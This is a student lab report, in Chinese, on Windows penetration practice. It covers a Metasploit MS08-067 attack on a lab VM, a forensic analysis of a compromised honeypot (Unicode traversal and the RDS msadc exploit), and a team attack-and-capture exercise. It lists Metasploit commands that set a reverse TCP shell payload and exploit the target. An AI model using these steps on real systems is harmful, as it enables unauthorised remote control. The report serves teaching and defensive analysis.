20232821 2023-2024-2 《网络攻防实践》实践6报告

20232821 2023-2024-2 《网络攻防实践》实践6报告

一、实践内容

1、动手实践Metasploit windows attacker
任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权
2、取证分析实践：解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击？
攻击者如何使用这个破解工具进入并控制了系统？
攻击者获得系统访问权限后做了什么？
我们如何防止这样的攻击？
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
3、团队对抗实践：windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

二、实践过程

实践1：动手实践Metasploit windows attacker
kali：192.168.200.6
win2k：192.168.200.124
首先在kali虚拟机中输入指令msfconsole：

接着输入指令：search ms08_067 搜索ms08_067漏洞情况：

输入命令use windows/smb/ms08_067_netapi，将ms08_067作为目标漏洞：

输入命令行show options查看攻击此漏洞需要的设置：

输入命令行show payloads显示此漏洞的载荷:

选择第三个载荷进行攻击
输入命令行set payload generic/shell_reverse_tcp设置载荷
输入命令行set RHOST 192.168.200.124设置要攻击主机
输入命令行set LHOST 192.168.200.2设置本机
输入命令行exploit进行攻击，出现会话连接即攻击成功，回车即可进入到受害靶机的shell:

输入命令行ipconfig/all查看靶机的IP，攻击成功:

打开wireshark查看抓包情况:

从wireshark抓包中可见：
源地址为192.168.200.6，源端口为44745，目的地址为192.168.200.124，目的端口为445，攻击发起时间从ARP协议的询问开始。
浏览wireshark抓包情况可知，攻击利用的漏洞有针对SMB网络服务的漏洞，DCERPC解析器拒绝服务漏洞，SPOOLSS打印服务假冒漏洞：

查看wireshark抓包的TCP流，可以看到靶机中输入的命令行被抓取：

实践2：取证分析实践：解码一次成功的NT系统破解攻击
用wireshark打开学习通的.log文件，发现里面有可识别的http协议内容、可识别的sql语句代码内容，可识别的系统操作代码内容和不可识别的二进制内容，我们需要对内容进行筛选，才能更好的分析，用规则ip.addr == 172.16.1.106 and http过滤数据:

跟踪一个数据包的tcp数据流，找到特殊字符%C0%AF。查询百度可知，Unicode字符解码中，存在Unicode解析错误漏洞，而/解码即为%C0%AF，因此确定存在Unicode漏洞攻击:

继续跟踪数据流，找到msabc.dll查看其数据流，发现有shell语句和！ADM的关键字符，根据此并查询百度可知，这是RDS漏洞:

问1：攻击者使用了什么破解工具进行攻击？
上述指令均采用了Microsoft Access Driver (*.mdb)的驱动，使用了c:\winnt\help\iis\htm\tutorial\btcustmr.mdb这个dbq文件。根据ADM!ROX!YOUR!WORLD这个特征字符串，查询得知攻击者应该是利用了由rain forest puppy所编写的 msadc(2).pl渗透攻击代码发起的攻击。
问2：攻击者如何使用这个破解工具进入并控制了系统？
观察发现，每一次的攻击时间都很短，可见攻击者应该是先将指令写入了shell脚本，然后将这个脚本与msadc.pl攻击脚本一起执行的。
攻击者打开主机后，使用FTP的方式下载文件，使用samdunp拿到口令，再利用pdump.exe破解。在第四次破解，也就是打开IP地址为213.116.251.162的主机后，攻击者成功拿到了访问权限。

问3：攻击者获得系统访问权限后做了什么？
攻击者获得了IWAM_KENNY和IUSR_KENNY的账号，并试图获取本地Administrator用户权限。
为此，攻击者将破解的口令写入了yay.txt中，将用户写入到hec.txt文件中。还试图删除和拷贝har.txt文件。
问4:我们如何防止这样的攻击？
①禁用不需要的服务和端口；
②可以打开自动更新，及时更新和打补丁；
③防火墙封禁网络内部服务器发起的连接；
④使用 IIS Lockdown 和 URLScan 等工具加强 web server；
⑤设置强口令，增大破解口令的难度；
⑥定期检测以及修复漏洞，及时安装补丁。
问5：你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么？
查看http数据流时，发现了端口6969。百度可知，端口6969是木马Gatecrasher、Priority开放的端口.

继续查看http数据流，可以看到删除了ftp文件，猜测攻击者删除之前下载了文件准备溜走:

可以看到如下信息：echo best honeypot i’ve seen till now : ) > rfp.txt。
可以认为攻击者警觉了他的目标是一台蜜罐主机:

实践3：团队对抗实践：windows系统远程渗透攻击和分析
将主机都网络设置都更改成桥接模式，将虚拟机虚拟网络设置中的桥接模式选择到真实网络。
实验中攻击机的IP为192.168.239.234

靶机的IP为192.168.239.100

测试连通性

根据之前实验的步骤，并将攻击机和靶机的IP对应写入：

攻击成功，通过命令创建了一个文件夹chenyanlin：

从靶机处看，可看到已经多出一个文件夹chenyanlin：

wireshark一直处于抓包状态：

跟踪数据流，发现了攻击方在C盘创建了一个文件夹chenyanlin：

三、学习中遇到的问题及解决

• 问题1：在进行实践3时，防守方win2k设置成桥接模式也无法获取ip地址。
• 问题1解决方案：开始-设置-网络和拨号链接-本地连接-属性-Internet协议。（TCP/IP）-自动获取IP和自动DNS。然后防守方win2k就有ip地址了，就可以被攻击。
• 问题2：在使用winXP靶机进行渗透攻击（实践3）时，出现错误代码：Exploit completed, but no session was created。
• 问题2解决方案：用win2k作为靶机。

四、实践总结

通过本次实验，我学习到了各种Windows操作系统安全攻防的基本原理和方法。学习使用Metasploit利用MS08-067漏洞攻击Windows系统。实践3出现太多矛盾点，最后解决。